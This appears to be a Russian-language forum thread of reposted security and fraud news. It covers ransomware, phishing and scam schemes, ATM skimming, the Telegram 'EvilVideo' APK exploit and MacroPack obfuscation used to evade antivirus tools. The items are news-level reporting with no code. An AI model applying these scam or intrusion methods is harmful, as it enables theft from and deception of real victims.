18 000 клиентов. В результате среди пострадавших оказались такие гиганты, как
Microsoft, Cisco, FireEye, а также множество правительственных агентств США,
включая Госдеп и Национальное управление по ядерной безопасности.
Источник: xakep.ru/2021/03/17/mimecast-source-code/
Канадская компания Sierra Wireless, специализирующаяся на разработке и производстве оборудования для беспроводной связи была вынуждена остановить производство из-за атаки шифровальщика. Продукция Sierra Wireless используется на промышленных предприятиях, в коммерческом, коммуникационном, энергетическом, транспортном, медицинском, правительственном и других секторах.
Sierra Wireless — один из крупнейших производителей беспроводного оборудования на сегодняшний день, чья продукция продается OEM-производителям и встроена в миллиарды IoT-устройств, включая автомобили, смартфоны и промышленное оборудование.
Судя по документам, предоставленным компанией в Комиссию по ценным бумагам и биржам, атака поразила Sierra Wireless в минувшие выходные, а именно в субботу, 20 марта 2021 года.
Неназванный вымогатель зашифровал внутреннюю сеть компании, из-за чего сотрудники лишились доступа к внутренним документам и системам, связанным с производством и планированием. В итоге Sierra Wireless временно приостановила работу своих производственных площадок, большинству из которых нужен актуальный доступ к заказам клиентов и спецификациям продуктов. Сайт компании тоже пострадал в ходе атаки и пока не работает.
«На данном этапе Sierra Wireless полагает, что атака ограничилась только системами Sierra Wireless, поскольку компания поддерживает четкое разделение между своими внутренними ИТ-системами, продуктами и услугами, ориентированными на клиентов», — заявляют в компании.
Click to expand...
Пока неясно, когда системы компании вернутся в строй, а также неизвестно, удалось ли злоумышленникам похитить из сети Sierra Wireless конфиденциальную информацию, как обычно делают вымогатели. Также неясно, заплатила ли компания злоумышленникам за восстановление данных, или специалисты Sierra Wireless восстанавливают пострадавшую информацию из резервных копий.
Источник: xakep.ru/2021/03/24/sierra-wireless/
Думайте дважды, прежде чем поставить лайк очередному блогеру.
Команда Bitdefender Labs обнаружила новую мошенническую схему, в которой преступники отправляют сообщения с неизвестного номера, чаще всего с кодом африканской страны, обещая оплату за лайки видео на YouTube.
Специалисты Bitdefender участвовали в такой схеме и выяснили, что мошенники запрашивают личную информацию, включая номер WhatsApp, возраст, профессию, полное имя и номер банковского счета, прежде чем просить жертву ставить лайки и подписываться. Похожие объявления о работе также были найдены в группах Facebook*, предлагающих удаленную работу или высокую оплату за лайки и подписки на каналы YouTube.
Исследователям было поручено поставить лайки трем видео на YouTube и отправить скриншоты в качестве доказательства. Затем жертв просят подписаться на Telegram-канал и обсудить детали оплаты с администратором. После предоставления необходимых данных исследователи получили вознаграждение в размере 30 RON (RONIN) (около $6,50). Мошенники обещают ежедневные задания.
Вторая фаза мошенничества начинается после того, как жертва присоединяется к каналу Telegram. Жертву приглашают в VIP-группу для выполнения более высокооплачиваемых заданий, доступ к которым открывается за плату от $21,66 до $1 083. После оплаты мошенники блокируют номер жертвы и прекращают общение. На Telegram-канале публикуются скриншоты платежей другим жертвам для создания доверия среди новых подписчиков.
Мошенники утверждают, что пользователи могут заработать 30 RON, ставя лайки 3 видео, и зарабатывать от 200 до более 2 000 RON в день. Одно из введений мошенников к предложениям звучало так (перевод с румынского): «Мы - глобальная многонациональная компания, и в настоящее время мы работаем как команда социальных медиа для повышения видимости звезд на YouTube и получаем оплату за подписку и лайки под видео звезд YouTube. Мы должны заполнить форму, чтобы выплатить вам зарплату в размере 30 RON».
В Bitdefender объяснили, что это не первый случай, когда мошенничество представляется как способ заработка денег. Однако на этот раз жертвы действительно получают оплату, что является очень успешной тактикой, поскольку она создает ощущение доверия и убеждает пользователей оплатить своё участие в VIP-канале для заработка легких денег на таких простых задачах, как лайки видео на YouTube.
Помните, что не существует легких денег. Чтобы избежать подобного мошенничества, будьте осторожны с рекрутерами, которые требуют высоких платежей за простые задачи, такие как просмотр видео или лайки на YouTube, побуждают пользователей скачивать Telegram или требуют предоплаты за доступ к дополнительным возможностям.
Иногда лучше пожертвовать репутацией компании, чем собственной свободой...
В 2014 году американская компания Uber, специализирующаяся на услугах перевозки пассажиров и доставки еды, подверглась кибератаке, в результате которой были похищены личные данные клиентов. Тот случай быстро стал «достоянием общественности» и пагубно сказался на репутации компании.
Спустя пару лет, в 2016 году, компанию вновь атаковали, похитив данные около 57 миллионов клиентов и 600 тысяч водителей. Действующий на тот момент глава служба безопасности Джо Салливан, решил не раскрывать информацию, чтобы спасти и без того пошатнувшуюся репутацию компании.
Совместно с руководством Uber, Салливан принял решение выплатить злоумышленникам выкуп в размере 100 тысяч долларов, чтобы те не распространяли похищенные данные. Разумеется, публичной огласки этот киберинцидент тоже не получил. Компания не уведомила о факте кибератаки ни клиентов, ни водителей, ни правоохранителей.
Однако в 2020 году правда раскрылась и Салливана начали «таскать» по судам. Ведь вне зависимости от того, был ли уплачен выкуп или нет, компания должна была уведомить об атаке общественность и соответствующие ведомства. И, так как она не сделала этого, всех причастных ждало весьма суровое наказание.
Спустя почти шесть лет после произошедшего, в октябре прошлого года, присяжные признали Салливана виновным по двум уголовным статьям, связанным с замалчиванием кражи персональной информации и обман надзорных органов. Федеральные чиновники настаивали на том, чтобы судья назначил Салливану 15 месяцев тюрьмы.
«Лидеры корпораций обязаны совершать правильные поступки даже тогда, когда это стыдно. Даже тогда, когда это плохо для прибыли компании. Ни корпорации, ни лица, которые ими руководят, не находится вне закона», — заявили чиновники.
Салливан выразил свои глубочайшие сожаления о принятых им решениях в 2016 году и попросил у суда снисхождения, получив шанс хоть как-то исправить то, что он натворил, и отдать долг обществу, насколько это возможно.
По итогу, буквально на днях судья в Сан-Франциско приговорил Салливана к трём годам условно и назначил 200 часов общественных работ, несмотря на просьбы прокуроров посадить его за решётку. Для бывшего CSO Uber всё разрешилось не так плохо, как могло бы, но правосудие, как и дурная репутация, даже спустя годы, всё равно догнали компанию и всех ответственных лиц.
Сталкиваясь с атаками вымогателей, конечно, стоит подумать о репутации компании, и придумать наиболее изящное решение, как подать негативную информацию клиентам и правоохранителям. Однако никогда не стоит скрывать сам факт атаки, недоговаривать чего-то ответственным органам или откровенно обманывать их. Как показывает данный случай, даже спустя годы, правда раскроется, и виновные всё равно ответят за свои действия.
source: regmedia.co.uk/2023/05/04/joe_sullivan_letter_to_judge.pdf
Полиция Великобритании конфисковала у 17-летнего жителя графства Линкольншир 48 биткоинов — сейчас это примерно £2,1 млн ($2,88 млн),[пишет ](https://www.lincolnshirelive.co.uk/news/lincolnshire-teenager- makes-2m-fake-6116584)Lincolnshire Live.
В апреле 2020 года школьник создал копию сайта Love2Shop по продаже подарочных сертификатов. Далее он купил рекламу в Google, чтобы его сайт отображался в выдаче выше оригинала.
Жертвы вводили свои электронные адреса и учётные данные от Love2shop на фейковом сайте, после чего их перенаправляли на подлинный. С помощью этих данных за неделю существования поддельного сайта парень перевёл на свой аккаунт Love2Shop чужие ваучеры на £6,5 тысяч.
По наводке одного из пользователей владельцы настоящего Love2shop начали расследование, но к тому времени школьник свой сайт уже удалил.
На PayPal-аккаунты подростка, чьё имя по распоряжению суда не разглашается, с января по март 2020 года поступило £323 тысячи. На них он покупал биткоин и другие криптовалюты.
По словам прокурора, сегодня 48 найденных у него биткоинов вместе с другими монетами оцениваются более чем в £2,1 млн.
Несовершеннолетнего приговорили к 12 месяцам реабилитации под постоянным надзором и 150 часам общественных работ. Он признал вину в отмывании денег и мошенничестве. Активы у него отобрали как прибыль, полученную в результате преступных деяний.
ps copypast
Киберпреступники распространяли вредоносное ПО, предназначенное для
модернизации персонажей многопользовательских компьютерных игр.
Сотрудники управления «К» МВД России совместно с коллегами из Москвы,
Свердловской и Оренбургской областей пресекли деятельность злоумышленников,
которые создавали и распространяли вредоносные компьютерные программы. Об
этом сообщает пресс-служба МВД РФ.
«Установлено, что злоумышленники на специализированных ресурсах в сети
интернет, в том числе в теневом сегменте, осуществляли распространение
вредоносного программного обеспечения, предназначенного для модернизации
персонажей многопользовательских компьютерных игр. Его использование давало
преимущество над другими игроками», – рассказала официальный представитель
МВД России Ирина Волк.
Следственным Управлением УМВД России по ЮЗАО ГУ МВД России по г. Москве
возбуждено уголовное дело по признакам преступления, предусмотренного частью
второй статьи 273 УК РФ.
В ходе обысков, проведенных по адресам проживания сообщников, изъяты:
компьютерная техника, свыше ста банковских карт, мобильные телефоны, а также
денежные средства в размере свыше восьми миллионов рублей, предположительно
полученные в результате преступной деятельности.
Источник - https://www.securitylab.ru/news/525213.php
Group-IB представила анализ мошеннических схем в глобальной сети. Суммарно на мошенничество приходится 73% всех киберпреступлений в Интернете, из них 56% — на скам (обман с добровольным платежом и раскрытием своих данных) и 17% на фишинг (кража данных банковских карт). Анализируя ущерб от мошенничества, Group-IB выявила не менее 70 активных скам-групп, работающих по схеме «Мамонт». Из них 54 нацелены на российских граждан. Менее чем за год они похитили у пользователей около 700 млн рублей.
Доклад Group-IB, анализирующий многообразие мошеннических схем и текущий ущерб для индустрий в разных странах, представлен сегодня, 10 июня, в Амстердаме в рамках первой онлайн-конференции Digital Risk Summit 2021, с участием представителей Всемирной организации здравоохранения (ООН), аналитического агентства Forrester, независимого международного проекта по борьбе со скамом Scamadviser и других.
«Кручу-верчу»: сколько зарабатывают мошенники
Расцвет скама пришелся на 2020-й год, прошедший на фоне мировой пандемии, что предопределило появлением понятия «скамдемия» (от анл scam/pandemic). В 2020 году рост числа нарушений в России, связанных со скамом и фишингом, зафиксированных Group-IB, составил 35% по сравнению с позапрошлым годом. Для сравнения: в Европе этот показатель равен 39%, в Азиатско-Тихоокеанском регионе 88%, на Ближнем Востоке — 27, 5%. Аналитики свидетельствуют: экономическими предпосылками для интенсивного распространения мошенничества стал уход бизнеса в онлайн и мировая пандемия: 40% продаж сегодня реализуется через социальные сети[1].
На саммите Group-IB впервые публично представила технологии слежения за мошенническими группами Scam Intelligence, ставшие «ядром» собственной инновационной системы Digital Risk Protection, разработанной на основе многолетнего опыта проведенных расследований киберпреступлений в мире. За год с ее помощью удалось предотвратить ущерб для бизнеса в России на сумму 18,8 млрд руб. В целом по миру предотвращенный ущерб оценивается в сумму $443 млн.
Использование нейронных сетей и адаптивного скоринга позволяют автоматизировать сложные процессы выявления и классификации типов мошенничества, использованного под конкретную компанию и индустрию в любой стране мира. Анализ системой DRP активности злоумышленников по всему миру позволил классифицировать мошеннические схемы, выявив около сотни базовых схем и их различные модификации.
Их разыскивает полиция: наиболее опасные схемы мошенничества
Так, на схему с фейковыми аккаунтами брендов в социальных сетях, наиболее характерную для финансового сегмента, приходилось, в среднем, свыше 500 фейковых аккаунтов на один банк в 2020 году. Страховые компании во всем мире страдают от фишинга: более 100 фишинговых сайтов, в среднем, создавалось в прошлом году под одну страховую компанию.
Таргетированное многоступенчатое мошенничество, получившее название «Белый кролик» с незаконным использованием брендов компаний, в 2020-м году в основном было направлено на ритейл-сегмент и Интернет-сервисы. Получая ссылку от друзей или от «компаний» через соцсети или мессенджеры с предложением поучаствовать в розыгрыше призов, акциях или пройти опрос, пользователи, в среднем, осуществляли 40 000 активных переходов на мошеннические сайты в день.
В целом, «Белым кроликом» были атакована клиенты не менее 100 известных брендов. Цель скамеров — кража денег, данных банковских карт и персональных данных. Пользователи проходят множество этапов, оказываясь на разных публичных площадках (соцсетях, мессенджерах, сайтах) и заканчивая скрытыми веб- ресурсами, для доступа на которые под каждую жертву формируется индивидуальная фишинговая ссылка, исходя из местоположения, IP-адреса, модели устройства, user-агента. Это делает невозможным их открытие другим пользователем, а сама схема становится менее уязвимой для обнаружения и блокировки.
Наибольшее распространение в период пандемии в России получила скам-схема «Мамонт», нацеленная на пользователей досок объявлений, сервисов курьерской доставки товаров, аренды недвижимости, бронирования отелей, банковских онлайн- переводов, онлайн-ритейла и поиска попутчиков для поездок.
Цель схемы заключается в вымогательстве денег в качестве оплаты за несуществующие товары, которые никогда не будут доставлены или услуг, которые не будут оказаны. В целом 44 страны, включая Россию, находятся в фокусе мошенников. По данным Group-IB DRP суммарно 93 бренда эксплуатируются в мошеннической схеме «Мамонт». К началу 2021 года общее количество вовлеченных злоумышленников, зарабатывающих на фейковых курьерских сервисах, составляло 12 500 человек. А общее количество сайтов, используемых в схеме, достигло отметки в 10 000. Размах этого типа мошенничества огромен, схема постоянно масштабируется. Только одна преступная группа, работающая по схеме «Мамонт» за месяц зарабатывает до 8,9 млн руб.
На данный момент в режиме постоянного мониторинга DRP находится деятельность более 70 мошеннических групп, специализирующихся на схеме «Мамонт», 54 из которых нацелены на российских пользователей. В среднем, с одной скам-группой связаны не менее 500 мошеннических сайтов, нацеленных на кражу денег и данных банковских карт.
Скамдемия не пройдет
Многообразие мошеннических схем и их модификаций, автоматизация большинства этапов атак, таргетинг под конкретную компанию или индустрию, а также широкие возможности сокрытия киберпреступной деятельности —стали технологическими предпосылками эпидемии онлайн-мошенничества— скамдемии. Например, по данным Group-IB, 47% нарушений по скам-схемам располагаются на доменах третьего уровня, что не позволяет обнаружить мошенничество вручную или заблокировать первый домен, поскольку формально он «чист».
Бороться со скамом с помощью классического мониторинга и поштучной блокировки ссылок уже поздно: мошенничество приобретает все более гигантские масштабы, что выдвигает новые требования к инструментам борьбы с ним. Система DRP должна уметь автоматизированно выявлять все элементы скам-инфраструктуры в мошеннической схеме, направленной на компанию. Если мы видим хотя бы одно нарушение, то немедленно обнаруживаем всю сеть атакующего. Это огромное количество мошеннических ресурсов, которые могут быть направлены на одну компанию, на всю индустрию или на организации разных индустрий. Принцип выстраивания мониторинга вокруг преступной группы обогащает его результаты, делая его более умным и масштабируемым.
Применение запатентованных разработок Group-IB DRP поиска и слежения за злоумышленниками , автоматизированный графовый анализ и слежение в режиме реального времени за инфраструктурой злоумышленников позволяют обнаруживать сразу всю сеть мошенников, блокируя ее, а не отдельные ссылки на фишинговые и скам-ресурсы. Таким образом 85% нарушений, связанных с любым типом мошенничества, устраняется в досудебном порядке, экономя ресурсы защищаемых организаций. В компании отмечают, что уверены в уровне защиты DRP, а если пользователь инициирует судебные разбирательства с компанией, чей бренд был использован мошеннической схеме, Group-IB готова взять на себя все расходы.
• Source: group-ib.ru/media/scamdemia/
Ранее Джо Байден просил Владимира Путина принять меры против киберпреступных группировок, действующих в России
Заместитель директора Федерального бюро расследований (ФБР) Пол Аббейт (Paul Abbate) сообщил об отсутствии каких-либо признаков того, что российское правительство предприняло шаги по пресечению деятельности киберпреступников, участвующих в атаках с использование программ-вымогателей против американских организаций.
«Мы просили помощи и сотрудничества для борьбы с теми, кто, как мы знаем, находится в России, и против которых у нас есть обвинения. Мы не видели никаких действий, поэтому я бы сказал, что в этом отношении ничего не изменилось», — пояснил Аббейт.
Как сообщило издание The Hill, комментарии Аббейта прозвучали через несколько месяцев после того, как президент США Джо Байден встретился с президентом России Владимиром Путиным на саммите в Женеве для обсуждения вопросов, включая серию атак с использованием программ-вымогателей на критически важные организации США со стороны базирующимися в России киберпреступных группировок.
Байден подчеркнул, что Путину необходимо принять меры против киберпреступных группировок, действующих в России.
«Ответственные страны должны принять меры против преступников, которые занимаются вымогательством на их территории. Поэтому мы договорились поручить экспертам обеих наших стран работать над определенным пониманием того, что запрещено, и следить за конкретными делами, которые происходят в других странах и в любой из наших стран», — сказал Байден.
«Сотрудниками ГУ МВД России по г. Санкт-Петербургу и Ленинградской области задержан 27-летний житель Новосибирска. Он подозревается в серии хищений денежных средств с банковских счетов в крупном размере.
По версии следствия, злоумышленник незаметно установил на потолке в одном из торговых центров Северной столицы скрытую камеру. Она была направлена на клавиатуру находящегося в помещении банкомата, могла фиксировать вводимые клиентами пин-коды и передавать их по мобильной связи в Интернет. В сам банкомат было встроено скимминговое устройство для считывания данных с пластиковых карт. Полученная информация позволяла изготавливать дубликаты карт и снимать деньги со счетов.
Как полагают следователи, в течение двух месяцев потерпевшими стали более 100 граждан. Сумма ущерба превышает 12 миллионов рублей. Похищенные средства переводились на подконтрольные счета, а затем конвертировались в криптовалюту.
Один из организаторов криминальной схемы был задержан оперативниками на железнодорожном вокзале Новосибирска после прибытия из Санкт-Петербурга. У него изъяли ноутбук и средства связи.
Следователем Следственного управления УМВД России по Московскому району г. Санкт-Петербурга возбуждено уголовное дело по признакам преступления, предусмотренного частью 3 статьи 158 УК РФ. Подозреваемому избрана мера пресечения в виде заключения под стражу.
Полицейскими устанавливаются все эпизоды и лица, причастные к противоправной деятельности», - сообщила официальный представитель МВД России Ирина Волк.
Правозащитный проект Gulagu.net получил сообщение от хакерской группы «Universal из Darknet», в котором заявляется, что хакеры поддерживают правозащитников и начинают атаку на сервера ФСИН.
Об этом правозащитники сообщили в своем Telegram-канале. Сам проект Gulagu.net с октября публикует видеозаписи пыток в российских колониях.
Сразу после получения сообщения сайт ФСИН перестал функционировать.
Однако
Владимир Осечкин основатель Gulagu.net действия хакеров не поддержал,
заступился за силовиков и потребовал немедленно прекратить атаки
После этого работа сайта ФСИН была восстановлена
PS: У Universal в онион сайт есть? Что за ребята?
Специалисты The Shadowserver Foundation предупредили, что около 150 000 устройств Fortinet FortiOS и FortiProxy по-прежнему уязвимы перед критической проблемой CVE-2024-21762, обнаруженной и исправленной в прошлом месяце. Она позволяет выполнять код без аутентификации.
Напомним, что уязвимость CVE-2024-21762 получила 9,6 баллов по шкале CVSS. Этот баг в FortiOS связан с out-of-bounds записью и позволяет неавторизованным злоумышленникам удаленно выполнить произвольный код, отправляя специально подготовленные HTTP-запросы на уязвимые машины.
В прошлом месяце специалисты Агентства по кибербезопасности и защите инфраструктуры США (CISA) внесли CVE-2024-21762 [в список](https://www.cisa.gov/news-events/alerts/2024/02/09/cisa-adds-one- known-exploited-vulnerability-catalog) известных уязвимостей, которые уже используют злоумышленники, и предупредили, что проблема уже задействована в хакерских атаках.
Как теперь сообщают аналитики The Shadowserver Foundation, в сети по-прежнему можно обнаружить около 150 000 уязвимых перед свежим багом устройств. Больше всего из них (более 24 000) находятся в США, а также немало уязвимых машин было замечено в Индии, Бразилии и Канаде.
[](https://xakep.ru/wp- content/uploads/2024/03/453934/CVE-2024-21762_VulnMap.jpg)
Исследователи напоминают, что администраторы могут проверить, уязвимы ли их системы перед этой проблемой, используя специальный Python- скрипт, созданный специалистами ИБ-компании BishopFox.
46-летний американец Роберт Робб арестован в Лас-Вегасе по обвинению в мошенничестве. Мужчина выманил у криптоинвесторов $1,5 млн для создания торгового бота, но так и не выполнил обещания.
По данным Федерального бюро расследования (ФБР), Роберт Робб (Robert Robb) публиковал в соцсетях сообщения «Пуф, ты миллионер» с изображением фиолетовой феи в грибной шапке. Потенциальным инвесторам обещалась баснословная прибыль, если они воспользуются специальным MEV-ботом, а также инвестируют в криптовалюту RAT и токен NoRugz. Аферист обещал, что новый бот будет сканировать сети блокчейна для совершения выгодных торговых сделок.
Всего за несколько недель Робб убедил нескольких инвесторов отправить ему в общей сложности $1,5 млн. Однако обещанный бот так и не появился. Пострадавшие инвесторы рассказали, что Робб неоднократно находил оправдания задержке, а на запрос о возврате средств не реагировал. Позднее полиция выяснила, что вместо разработки торгового инструмента мошенник перевел полученные деньги на личные банковские счета, а затем потратил их покупку роскошного автомобиля и отдых на Багамах.
Также выяснилось, что в прошлом Робб сам стал жертвой вымогательства. Согласно его твитам под ником pokerbrat2019, мужчина часто писал в соцсети Х о ботах MEV, предупреждая пользователей остерегаться мошенничества с криптовалютами. В день своего ареста Робб упрекнул своих подписчиков в том, что они слишком предсказуемы, пообещав при этом выпустить бот Solana.
ИБ-исследователи Cisco Talos [предупреждают](https://blog.talosintelligence.com/threat-actors-using- macropack/), что фреймворк MacroPack, изначально разработанный для специалистов red team, используется злоумышленниками для развертывания вредоносных полезных нагрузок, включая Havoc, Brute Ratel и PhatomCore.
MacroPack представляет собой проприетарный инструмент, созданный французским разработчиком Эмериком Наси (Emeric Nasi) из BallisKit. Это решение предназначено для специалистов red team, которым нужно симулировать поведение хакеров.
Инструмент предлагает такие функции, как обход антивирусных программ, имеет защиту от реверса, а также позволяет создавать различные обфусцированные полезные нагрузки для документов и встраивать в них незаметные VB-скрипты.
Также существует опенсорсная lite-версия MacroPack Community, однако она больше не поддерживается.

Разработчик анонсирует новые функции в MacroPack
Аналитики Cisco Talos предупреждают о существовании множества документов,
которые были созданы при помощи MacroPack. Такие документы отличает
переименование функций и переменных на основе цепи
Маркова,
удаление комментариев и лишних пробельных символов, которые снижают частоту
обнаружения при статическом анализе, а также кодировка строк.

Общая схема атак с использованием MacroPack
Эксперты изучили вредоносные документы, загруженные на VirusTotal из разных стран, включая США, Россию, Китай и Пакистан. Содержимое этих документов- приманок различалось, а также атаки имели разную сложность и векторы заражения. То есть MacroPack явно применяют разные хак-группы.
Отличительной чертой всех этих документов, указывающей на то, что они были
созданы с помощью MacroPack Pro, является наличие четырех не вредоносных VBA,
которые связаны с профессиональной версией фреймворка.

Жертвы, открывающие такие документы в Microsoft Office, запускают VBA-код
первого этапа, который загружает вредоносную DLL, подключающуюся к
управляющему серверу злоумышленников.
Исследователям удалось выявить четыре крупных кластера вредоносной активности,
связанных со злоупотреблениями MacroPack:

Один из вредоносных документов
Напомним, что Brute Ratel Command and Control Center (Brute Ratel C4 или BRc4) это решение для для пентестеров и red team, ориентированное на эксплуатацию и постэксплуатацию. Первые злоупотребления Brute Ratel были обнаружены еще летом 2022 года.
Так как BRc4 во многом ориентирован на уклонение от обнаружения EDR и антивирусными решениями, защитные продукты зачастую не определяют в нем вредоносное ПО. Из-за этой особенности ИБ-исследователи называли Brute Ratel «уникально опасным», а злоумышленники сочли его хорошей альтернативой CrowdStrike. К примеру, в том же 2022 году было замечено, что хакеры взяли на вооружение взломанную версию Brute Ratel.
Деятельность преступной организации разоблачили сотрудники управления противодействия киберпреступлениям в Харьковской области совместно со следственным управлением Харьковской полиции и в сотрудничестве со службой безопасности украинского банка, а также при поддержке внутренней безопасности Министерства юстиции Украины.
Организовал схему 20-летний мужчина, который сейчас находится под стражей в следственном изоляторе. К противоправной деятельности фигурант привлек своих сокамерников, которые совместно подыскивали «рабочих» в Интернете. Большинство из участников преступной организации занимались поиском потенциальных потерпевших.
Фигуранты регистрировались на торговой онлайн-площадке. Для осуществления платежа или для продажи товара злоумышленники предоставляли потерпевшим ссылку на фишинговую страницу заполнения реквизитов банковской карты. Другие члены группы с помощью различных платежных систем оформляли переводы денег с банковских карт потерпевших на подконтрольные организатору счета. По оперативным данным, сумма ущерба достигает 18 миллионов гривен.
Также установлено, что злоумышленники реализовывали указанную схему и для иностранных интернет-площадок. Среди обманутых - граждане Испании, Португалии, Сингапура, Австралии и других стран.
Сотрудники полиции провели 24 обыска в следственном изоляторе и в домах
фигурантов. Изъяты компьютерная техника и мобильные телефоны. К проведению
обысков также были привлечены сотрудники полка полиции особого назначения
полиции Харьковщины.
Участники группировки были задержаны в порядке ст. 208 Уголовного
процессуального кодекса Украины.
На данный момент девятерым фигурантам объявлено о подозрении по ст. 255 (Создание, руководство преступной организацией, а также участие в ней), ч. 3 ст. 190 (Мошенничество) Уголовного кодекса Украины. Подозреваемым грозит до двенадцати лет лишения свободы с конфискацией имущества. Решается вопрос об избрании меры пресечения.
Москвичка попала на мошенничество, связанное с онлайн-магией.
Все началось с того, что она наткнулась на объявление «Магия онлайн Зара» и решила заказать гадание за 800 рублей. После ритуала таролог сообщила девушке, что на нее наложена порча и попросила скинуть 31k, чтобы ее снять. Девушка перевела деньги, но магия не сработала и пришлось доплачивать. Все деньги мошенница обещала вернуть.
После того, как девушка перевела 310 тысяч рублей и оказалось, что еще надо 340 потому что магия никак не хотела действовать, потерпевшая заподозрила подвох и решила пойти в полицию.
Эксперты компании ESET рассказали об уязвимости нулевого дня в Telegram для Android, получившей название EvilVideo.
Проблема позволяла злоумышленникам отправлять пользователем apk файл прикрытым под видео
По данным исследователей, хакер под ником Ancryno начал продавать эксплоит для этой 0-day проблемы еще 6 июня 2024 года. В своем сообщении на хак-форуме XSS он писал, что баг присутствует в Telegram для Android версии 10.14.4 и старше.

Хотя исходно злоумышленник утверждал, что эксплоит относится к типу one-click (то есть срабатывает за один клик и требует минимального взаимодействия с человеком), на самом деле для выполнения вредоносной полезной нагрузки на устройстве жертвы требовался ряд шагов и определенные настройки, что заметно снижало риск успешной атаки.
Специалисты ESET смогли обнаружить проблему после того, как в публичном Telegram-канале была опубликована PoC-демонстрация уязвимости, что позволило им получить вредоносную полезную нагрузку.

Согласно отчету компании, эксплоит действительно работает только в Telegram версии 10.14.4 и старше. Аналитик ESET Лукаш Стефанко (Lukas Stefanko) уведомил о проблеме разработчиков Telegram 26 июня и еще раз 4 июля 2024 года. Вскоре после этого представители Telegram ответили, что изучают сообщение исследователей, а затем исправили уязвимость в версии 10.14.5, вышедшей 11 июля 2024 года.
Хотя неизвестно, использовалась ли эта проблема в реальных атаках, ESET обнаружила по адресу infinityhackscharan.ddns[.]net управляющий сервер, который использовался упомянутой выше полезной нагрузкой. Кроме того, по информации издания Bleeping Computer, на VirusTotal удалось найти два вредоносных APK-файла (1, 2), использующих этот управляющий сервер. Обнаруженные приложения выдавали себя за Avast Antivirus или xHamster Premium Mod.
Уязвимость EvilVideo позволяла злоумышленникам создавать специальные файлы APK, которые при отправке другим пользователям Telegram выглядели как встроенные видео.
Исследователи полагают, что эксплоит использовал API Telegram для создания сообщения на программном уровне, которое выглядело как 30-секундное видео. Так как по умолчанию Telegram для Android автоматически загружает медиафайлы, пользователи получали полезную нагрузку на свое устройство, сразу после того как открывали беседу. Если же у пользователя была отключена автоматическая загрузка, ему нужно было кликнуть на превью, чтобы инициировать загрузку файла.
Когда пользователь пытался воспроизвести фальшивое видео, Telegram сообщал, что не может открыть ролик и предлагал использовать внешний плеер, что могло побудить жертву нажать на кнопку «Открыть» и выполнить полезную нагрузку.

Впрочем, на следующем этапе требовался дополнительный шаг, серьезно снижавший эффективность таких атак: жертва должна была вручную разрешить установку приложений из неизвестных источников в настройках, чтобы вредоносный APK смог установиться на устройство.

Специалисты ESET отмечают, что протестировали эксплоит в веб-клиенте Telegram и Telegram для десктопов и убедились, что там он не работает, поскольку полезная нагрузка воспринимается как видеофайл в формате MP4.
В исправленной версии Telegram для Android (10.14.5) APK-файлы тоже отображаются корректно, и выдать их за видеоролики больше не получится.
Американский инвестор Майкл Бьюрри, который еще в 2005 году предсказал кризис на рынке ипотеки, который привел к банковскому краху 2008 года в США, вновь делает ставку на падение финансовых рынков. Об этом свидетельствует форма 13-F, размещенная на сайте Комиссии по ценным бумагам и биржам США (SEC).
По данным регулятора, его хедж-фонд Scion Asset Management продал практически весь портфель акций (включая крупные позиции в JD.com и Alibaba) и купил опционы на снижение фондовых индексов S&P 500 и Nasdaq 100.
Хотя номинальная стоимость контрактов составляет около $1,6 млрд, реальные вложения фонда значительно меньше. Тем не менее, эксперты оценивают размер ставки Бьюрри на падение рынка примерно в 90% от активов его фонда, сообщает Bloomberg.
В прошлом году Бьюрри спрогнозировал новый скачок инфляции и рецессию в США. Свои предсказания грядущих рисков он делает на основе анализа макроэкономических показателей.
Майкл Бьюрри известен тем, что одним из первых предсказал падение рынка недвижимости и ипотечного кредитования, которое вызвало финансовый кризис 2008 г. Бьюрри сделал ставку против американского рынка недвижимости, заработав для инвесторов фонда Scion Capital $700 млн. Впоследствии его история легла в основу фильма «Игра на понижение».
В Twitter (где его аккаунт периодически удаляется и восстанавливается) имеет ник «Cassandra» в честь древнегреческой троянской царевны, наделенной Аполлоном даром пророчества и предвидевшей гибель Трои, предсказаниям которой никто не верил.
source:[https://rns.online/markets/51245593...8-goda-postavil-1-5-mlrd-na- obval-rynka-ssha/](https://rns.online/markets/51245593-finansist- predskazavshiy-krizis-2008-goda-postavil-1-5-mlrd-na-obval-rynka-ssha/)
Ресерчеры ИБ-компании eSentire объявили о деанонимизации оператора вредоноса Golden Chickens, который, как считают исследователи, был идейным вдохновителем проекта. Его настоящее имя специалисты оставили в секрете, отметив, впрочем, что им известно не только оно, но и имена его жены, матери и двух сестер. В своем исследовании они назвали подозреваемого Джеком.
В материале отмечается, что Джек использовал два аккаунта на форуме Exploit, причем делал это совместно со своим сообщником, который был деанонимизирован той же ИБ-компанией в августе 2022 года. Его партнер скрывался за ником Chuck from Montreal, и давал Джеку пользоваться. Параллельно Джек использовал аккаунт badbullzvenom.
ИБ-эксперты заявили, что Джек живет в Бухаресте (Румыния), и у него есть белый бизнес — компания, занимающаяся импортом и экспортом овощей и фруктов. Его работа в онлайне началась в 2008 году, когда хакеру было всего 15 лет. Тогда он интересовался вредоносами и инфостилерами, однако со временем вырос в разработчика стилеров паролей и шифровальщиков.
В 19-летнем возрасте Джек столкнулся с массовыми обвинениями в неспособности оказывать высокий уровень поддержки покупателям его программ и заявил о переезде в Пакистан. Точных данных о том, состоялось ли это путешествие на самом деле, нет. Однако специалисты eSentire нашли сходство в тактиках и программных особенностях пакистанского вредоноса SideCopy и ранней разработки Джека VenomLNK.
Эксперты считают, что Джек и Chuck from Montreal познакомились в 2013 году. Тогда Chuck from Montreal на одной из даркнет-площадок указал Jabber, который Джек использовал на одном из первых своих аккаунтов на форумах. Судя по всему, чтобы прошлая репутация не портила Джеку бизнес, он договорился о сотрудничестве с человеком, у которого в даркнет-биографии было куда меньше темных пятен. Совместными усилиями сообщники продвигали инструмент VenomKit, который спустя несколько лет превратился во вредоносный набор Golden Chickens.
Что любопытно, Джек после переезда на чужие аккаунты, судя по всему, не сменил модель поведения. В июле 2022 года на Exploit появился арбитраж от новорега с платной регистрацией и ником babay. Сумма претензии составляла миллион долларов.
«Ответчик кинул, не выполнил свои обязательства, несет полную ахинею, на контакт не идет, деньги возвращать отказывается. Ситуация приватная, логи скинул админу. За любую информацию, которая приведет к его деанонимизации, плачу 200 тысяч долларов через гарант», — написал babay.
Тогда поиски badbullzvenom не увенчались успехом. Однако теперь babay точно знает, кому можно отправить деньги за конкретные данные о разработчике Golden Chickens.
source:
esentire.com/web-native-pages/the-hunt-for-venom-spider-part-2
forum.exploit.in/topic/209436/
